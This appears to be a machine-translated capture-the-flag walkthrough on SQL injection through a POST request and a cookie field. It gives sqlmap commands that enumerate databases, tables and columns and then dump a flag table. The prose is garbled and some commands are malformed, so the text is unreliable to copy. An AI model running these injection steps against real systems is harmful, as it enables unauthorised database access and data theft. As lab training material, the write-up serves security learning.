table of Contents
- sqlmap the injection POST
- cookie injection violence database
POST injection
1. Verify the presence injection
Normal data packets " the cookie: the User the User =" modify " the cookie: the User ADMIN =" post will appear flag parameters
Verify Cookie: user = admin 'and' 1 '= 1' error, no echo In Flag, illustrate this situation exists injection
2. Copy the post Save as file 1.txt
>> Here is the injection of the modified cookie, then the cookie injection of view to combine the principles of post injection, in fact, two of which are to be injected into the joint, independently of each other.
cookie injection
The so-called POST injection is sending a POST request to packet injection, cookie injection is to modify the cookie information to disguise the identity or that infiltrate as an injection point
1. storms database
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql --dbs
>> you can see there are four databases
POST file 1.txt here to write a file location such as: /root/1.txt
cookie to be written: - cookie = "user = admin"
--string parameters, the result is used to specify the character true when the page contains, does not contain this character will be judged as false: - string = "flag" represents the correct word when the echo flag
Specify the database type: - dbms = mysql
Storm Database: - dbs
Table 2. Guess
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee --tables
There are three tables >> guess employee database under
:-D guess the name of the database table for a specific database
Guess Table: - tables
Other parameters unchanged
3. Guess table fllaagg columns
>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg --columns
Guess columns to specify the database, table :-D database -T Datasheet
Guess Column: - columns
4. guess the fields in the table
>sqlmap -r 1.txt -p - -cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql -D employee -T fllaagg "flag" --dump
>> find field contains a flag
Guess field to specify the database, table, database content :-D -T Data Sheet "Content"
Guess fields: - dump
The same method can view the contents of the other databases, tables, the injection point is the same method, where the injection point of the data packet modified cookie data. If the present data packet itself POST directly injected post injection, the injection can not add cookie --cookie "user = admin" like this parameter.